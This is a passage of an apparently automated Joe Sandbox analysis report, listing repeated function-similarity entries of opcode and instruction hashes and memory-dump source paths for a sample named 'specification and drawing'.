                                                                                                          • Opcode ID: ebdc1e1b9d0cc2631be882f154bbcaaee1f23ccf0c921a2470b2a16cab29cc3f
                                                                                                          • Instruction ID: f8d850d57eb22aa111e0d8e5523b475f6719fbe01b6b2705235eef7055c3e469
                                                                                                          • Opcode Fuzzy Hash: ebdc1e1b9d0cc2631be882f154bbcaaee1f23ccf0c921a2470b2a16cab29cc3f
                                                                                                          • Instruction Fuzzy Hash: AA41E4725047459FC329DF69C840BAAB7E5FFC8B00F14061DFA958B680E730D904C7A6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 69a2818d33fdb7cb7f9e66c244e0070966d83e1533bd1621fed77c83c87692ca
                                                                                                          • Instruction ID: 7bf1c97517cbe800bbf5f2c98c90805505c4c0c675ea954c1b4b416b828c429b
                                                                                                          • Opcode Fuzzy Hash: 69a2818d33fdb7cb7f9e66c244e0070966d83e1533bd1621fed77c83c87692ca
                                                                                                          • Instruction Fuzzy Hash: 7E41CE702003128BD725CF28D8A4BAEBBE9FF90B60F14456DEA95CB291DB30D841CF91
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                          • Instruction ID: f63bf91014e293a395c3ef75f9eb370ebedec228faa747569c4f58fa9b44c534
                                                                                                          • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                          • Instruction Fuzzy Hash: 0F31F231A04345ABDB229B6CCC44BDFBFE9AF54750F0481A9F899D7356CB749884CBA0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: fe205ab4cc1f26f9da1f87b4cd8e8c6d81870bf8f1312e9df90f064accd50e8a
                                                                                                          • Instruction ID: 47439f9f667c5096efbb93700607d03ffff8b77468f807458f7122cb67870ad9
                                                                                                          • Opcode Fuzzy Hash: fe205ab4cc1f26f9da1f87b4cd8e8c6d81870bf8f1312e9df90f064accd50e8a
                                                                                                          • Instruction Fuzzy Hash: B341AD71200B459FD72ACF28C891BDA7BE5BB59714F01852EF6998B290D774E810CB50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f7347ad76c9c86dc65c89daed89238317501206b72f65cd682cfb8c4669e39ed
                                                                                                          • Instruction ID: ae6c46c32f65a240285cc45de59baa649821040ebc5f16cc2e73ec7b7af813fd
                                                                                                          • Opcode Fuzzy Hash: f7347ad76c9c86dc65c89daed89238317501206b72f65cd682cfb8c4669e39ed
                                                                                                          • Instruction Fuzzy Hash: BC31E672505325AFD71ADB14CC01EABBBACEB54660F05492DF95187250E771EC14CBA2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 62cd1489a2f94fac1064c8199035ed1ffa7526024ddac71b8d5cf006a82573ad
                                                                                                          • Instruction ID: a3d1da16a51b81bd741cea083c37a48afc289d0510e1bef428599e66e0c06904
                                                                                                          • Opcode Fuzzy Hash: 62cd1489a2f94fac1064c8199035ed1ffa7526024ddac71b8d5cf006a82573ad
                                                                                                          • Instruction Fuzzy Hash: 5E31B2712027869BF32F575DC948FA57BD8BB80B44F1D00A0AB859B6DADB28D841C625
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          • Instruction ID: 6357023d69b9465d2226bef9cdbd69c90548d5e0a129599e095d3ece1061c615
                                                                                                          • Opcode Fuzzy Hash: 2675b2a233ffca7558ce8bac51e1e675200be2db598c830a74439531962ec826
                                                                                                          • Instruction Fuzzy Hash: FA21B1719006299BCF19DF59C881AFEB7F4FF48744F400069FA81AB240D778AD41CBA1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9c51ff72ff13f8dda64ceaa356186f93cf07f3017d801b082ad26a3e0c462111
                                                                                                          • Instruction ID: 43e72a14987dbe21c9ab4bca86946e3742fea3953bfb89ab23dfa17ad3d19a61
                                                                                                          • Opcode Fuzzy Hash: 9c51ff72ff13f8dda64ceaa356186f93cf07f3017d801b082ad26a3e0c462111
                                                                                                          • Instruction Fuzzy Hash: A4218D71A00645AFD719DB69D840FAAB7A8FF48740F140069FA44DB690D734ED40CB58
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b619b52fd3c2fc7104eb604e7742bcdead99f33f4d6dae6d6ed390e2fd0e4a62
                                                                                                          • Instruction ID: 22b7755439e8bee3f4543962b19a9ef49ba949650b79d8fb265d4f0b307e4514
                                                                                                          • Opcode Fuzzy Hash: b619b52fd3c2fc7104eb604e7742bcdead99f33f4d6dae6d6ed390e2fd0e4a62
                                                                                                          • Instruction Fuzzy Hash: 0E21B3B29083469FD715EF5AD844FDBBBDCAF94A44F08045ABE80CB291D734D904C7A2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a824616dae95efd5b2d4b6e010fb2289377e0d42e5e2125c40287759dddddb75
                                                                                                          • Instruction ID: d6a64d50d646dd259c3c5ff0214d8092b9d4adf31cf7c53bbdee7fa136a872b5
                                                                                                          • Opcode Fuzzy Hash: a824616dae95efd5b2d4b6e010fb2289377e0d42e5e2125c40287759dddddb75
                                                                                                          • Instruction Fuzzy Hash: 92213E316457969FE326672DDD08B593BD8EF41B74F2803A0FAA09F6D2D768C8018645
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a9c44964ca1a8c33db3051f852bb27b513693e4dd9fc316c33b5271f3639d833
                                                                                                          • Instruction ID: 0c6857260ab4de3d26283863c0b490db24973260ad516e17c248a0bbbcac711a
                                                                                                          • Opcode Fuzzy Hash: a9c44964ca1a8c33db3051f852bb27b513693e4dd9fc316c33b5271f3639d833
                                                                                                          • Instruction Fuzzy Hash: F0219A75200B01EBCB29DF29CD41B8677F5EF48B44F14846CA549CBB61E331E942CB94
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 077a97ff666e394c8c84e95912cafc6079d5bfdcab4485760f0ed4f243a6c20b
                                                                                                          • Instruction ID: 9936a17f7438482dd4e4c623f04d6f7604fe21bdfcc7801aa17b71fdcb44b2aa
                                                                                                          • Opcode Fuzzy Hash: 077a97ff666e394c8c84e95912cafc6079d5bfdcab4485760f0ed4f243a6c20b
                                                                                                          • Instruction Fuzzy Hash: 5D21E9B1E01209ABCB14DFAAD9909EEFBF9FF98B10F10012EE515A7250D7709941CB54
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                          • Instruction ID: 3085576bed3125985f2d21acec13a3689547ad79389268e80ccbca8bdf34bd87
                                                                                                          • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                                                          • Instruction Fuzzy Hash: 88218C72A00209EFDF169F99CC80BAEBBB9EF88310F214419F960A7251D734D9509B50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                          • Instruction ID: 5c3695b2a5c3d2ea004d913a34d2337dd362e3d4b15c76ba14c67bd69b442481
                                                                                                          • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                                                          • Instruction Fuzzy Hash: F411EF72640605AFE7229B48CC82FDABBB9EB80754F10406DFB448B580D671ED44CB60
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cee7e4eea0f077ca9ff79b198ca526c1ae5316f479653d852491ce7e458c526a
                                                                                                          • Instruction ID: d16af9972b8db01f79c5c16950e6b0e8909f7c5d998afbcdfa116b6522d3f7d5
                                                                                                          • Opcode Fuzzy Hash: cee7e4eea0f077ca9ff79b198ca526c1ae5316f479653d852491ce7e458c526a
                                                                                                          • Instruction Fuzzy Hash: AE1193357006119FDB55CF4DC4C0A5EBBE5BF56B10B1881AEEE489F204E6B2D901CB94
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                          • Instruction ID: 5d3f76459771b7126c7d6f0b754804caed7df4157e630e50eb6b10303779ba98
                                                                                                          • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                                                          • Instruction Fuzzy Hash: EB21AC71B00609DFD7259F49C541A66BBE6EF94B10F14887DEA898BA1AC730EC00CB40
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ecdae61ee07d87901ca4c439c5f7addaf3b607c5327a301a7d4e73e9dc29e8c9
                                                                                                          • Instruction ID: 332776c5a5bff876155382ae8520d9edc1786fad6aecfc9b291faac8c167c027
                                                                                                          • Opcode Fuzzy Hash: ecdae61ee07d87901ca4c439c5f7addaf3b607c5327a301a7d4e73e9dc29e8c9
                                                                                                          • Instruction Fuzzy Hash: 5F215E75A00205DFCB14CF58C591AAEBBF9FB88714F2481AED545AB351C771AD06CF90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 7c4d1f5df4f2a3bc06d9e1b04a679b3f17a7d8f852681ccf8966542231af57bd
                                                                                                          • Instruction ID: 45c9a124a172a79779ef25ba2fe51799ca8179a039d86f152b58ad24da4e7d13
                                                                                                          • Opcode Fuzzy Hash: 7c4d1f5df4f2a3bc06d9e1b04a679b3f17a7d8f852681ccf8966542231af57bd
                                                                                                          • Instruction Fuzzy Hash: 7D218E75500B00EFD7249F68C881B6AB7F8FF84350F00882DE69AC7A50DB71A840CBA0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6b3c4947a2fe6d09d298a461cd36336618c3ac248b432c67007a8ea415abf031
                                                                                                          • Instruction ID: b277003eb527fd8e71ce2e4ae4e14c8abac174a8f1e91bcfe8ebb8cf43e6293c
                                                                                                          • Opcode Fuzzy Hash: 6b3c4947a2fe6d09d298a461cd36336618c3ac248b432c67007a8ea415abf031
                                                                                                          • Instruction Fuzzy Hash: 4E11C172240605EFC76ADB69CD40F9A77B8EB59760F414025FA619B260EB70E901C7D0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: dc0a575eec7a646243bf9b8f56a3d450bb66b4481c1eb0b3769116607ff7a31f
                                                                                                          • Instruction ID: 706a4f8324bc0284a93b8c0456cf0aaf71f811b7ef768164ea70cb2f1dd58dd2
                                                                                                          • Opcode Fuzzy Hash: dc0a575eec7a646243bf9b8f56a3d450bb66b4481c1eb0b3769116607ff7a31f
                                                                                                          • Instruction Fuzzy Hash: C61108733001199FCB1DDB29CD85AAF72E7EBE5270F358529D922DB290EA309812C390
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e561b12d55e01121453db25f72307622c325a2311e1ff9b419c7cf98ff21006e
                                                                                                          • Instruction ID: c6b3672e157b771a99c54f37a268924193b025ca1831d785a094f923512ccdcc
                                                                                                          • Opcode Fuzzy Hash: e561b12d55e01121453db25f72307622c325a2311e1ff9b419c7cf98ff21006e
                                                                                                          • Instruction Fuzzy Hash: 2011CE76A01305EFCB29CF59C582A5ABBF8AF94610B0140BDDA859B711E630DD00CBA0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                          • Instruction ID: 536bd35d55ea2e4f3548958c5d151273fa15ab7e60f9110232840cf5d4d0dd3d
                                                                                                          • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                          • Instruction Fuzzy Hash: C7110436A00919AFDB1DDB58C801F9EFBF5EF84214F058269E845A7340E731AD01CB80
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c7e1d823914e16f255c749f4e09211102cd0985e8dca45d6f81b1fb8d6880997
                                                                                                          • Instruction ID: f88de7988ebb10f37b4a91857b9c9f43844a825836ef589c9001b067ebebaf54
                                                                                                          • Opcode Fuzzy Hash: c7e1d823914e16f255c749f4e09211102cd0985e8dca45d6f81b1fb8d6880997
                                                                                                          • Instruction Fuzzy Hash: 4001F7B1200B097FC315BB79CD80E97B7ACFF946547000629B50583561DB34EC11C6E0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 07c4234d3f1c181a2c9f35712c09f4c3866cbb31b6cc61c5c998d18a89032a24
                                                                                                          • Instruction ID: f26b12f79df7add2566eb89dfa34bf60e90ae324a4c7e73531b8519555239dd2
                                                                                                          • Opcode Fuzzy Hash: 07c4234d3f1c181a2c9f35712c09f4c3866cbb31b6cc61c5c998d18a89032a24
                                                                                                          • Instruction Fuzzy Hash: 3F01FC32224712DFC368DF7AD8889A7BBA8FF54664F514229ED79871C0E7309901C7D2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: fe1ba715b1368caebe970e01e487f0720d417dcc6fbb66935810c8ae8b3e23b9
                                                                                                          • Instruction ID: 636392d547b8f6ff80cc51bae7b14b6a5c923766c22a0daff392edd576631ec6
                                                                                                          • Opcode Fuzzy Hash: fe1ba715b1368caebe970e01e487f0720d417dcc6fbb66935810c8ae8b3e23b9
                                                                                                          • Instruction Fuzzy Hash: 3F115B75A01209ABDB19EFA8C940EAE7BB5FB48644F004059B90197390DB34EA11CB90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b1c18186ea5c3870f24f0ca28d7065726abf6a0b11614222bb47703b3854b152
                                                                                                          • Instruction ID: 60adca924372c47458fa70b7733e8da0f667724c4e6856bddcf067b5aade0d9a
                                                                                                          • Opcode Fuzzy Hash: b1c18186ea5c3870f24f0ca28d7065726abf6a0b11614222bb47703b3854b152
                                                                                                          • Instruction Fuzzy Hash: 3A1139B5A193099FC704DF69D441A9BBBE4FF98710F00851EBA98D7391E770E900CB96
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a745a2def9fd17432e8bc9d07bd9b65e71845b6d80ab26ca8e5b44f7f3bf05a8
                                                                                                          • Instruction ID: 1eb2070de7d5a1daa99cbd3c1d83eb3478b036c9216efccb3e586678241bf642
                                                                                                          • Opcode Fuzzy Hash: a745a2def9fd17432e8bc9d07bd9b65e71845b6d80ab26ca8e5b44f7f3bf05a8
                                                                                                          • Instruction Fuzzy Hash: E91179B1A193089FC304DF69D441A4BBBE4FF99750F00851AB998D73A0E770E900CB96
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                          • Instruction ID: af70bf31075985ba792d2015b78a51501f9afb1f81fce82eebde949a037bf3c7
                                                                                                          • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                          • Instruction Fuzzy Hash: 6B014C362006069FDF29DA6DD944F93B7E6FFC1200F044459E6538BA90DB74F842C754
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                          • Instruction ID: b0ce9d4f94b6bf8e4600e86581d6ae7f79a7103cbc722cffab8f83006dc939d4
                                                                                                          • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                          • Instruction Fuzzy Hash: 8501DF322146849FE32A872DC908F2ABBD8EF44B44F0900B1FA45CF691D738DC80C621
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c562cb31d2cf5c3bf596a28b199a905d6825c11d7f46cd885c2db836f6672eab
                                                                                                          • Instruction ID: e147111640723ebe869d9bbd52e507eb95b3b26d821e52d7b9b8682c99d44281
                                                                                                          • Opcode Fuzzy Hash: c562cb31d2cf5c3bf596a28b199a905d6825c11d7f46cd885c2db836f6672eab
                                                                                                          • Instruction Fuzzy Hash: 6401DF31A14505ABC71CEB6AD8809EEB7BDEF80620F05806ADA01A76A0DF30E902C690
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: d336715f02088652cef7401ab0fcc1fdeac12cf0d49b0890c7f05c7db0716ebb
                                                                                                          • Instruction ID: e501fca1e572d9522aa96c0a18f507211fd577ba1fa3743397d056be5ae5cfe6
                                                                                                          • Opcode Fuzzy Hash: d336715f02088652cef7401ab0fcc1fdeac12cf0d49b0890c7f05c7db0716ebb
                                                                                                          • Instruction Fuzzy Hash: 12F0F432B41B25B7C7359B5A8D40F5BBAA9EB94FA0F00402CA64597600CA30ED01CBB0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                          • Instruction ID: d5a2e68cdcc854230b445e33b760e7fb78a1ffbea9f44c2a8259354b6da02f75
                                                                                                          • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                          • Instruction Fuzzy Hash: 2DF0C2B2A00615AFE328CF4EDD40E57FBEEDBD5A80F048168E549C7220EA31DD04CB90
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                          • Instruction ID: be3259422875d80e9ad87eee374ad4ee48733744aac1ec37fb9e10b01afcd26f
                                                                                                          • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                          • Instruction Fuzzy Hash: 0CF08B33206A339BF732165D49C0BEFAAD58FE1F64F1A4036F2899B304CA648D0293D0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.2401295024.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_1090000_specification and drawing.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
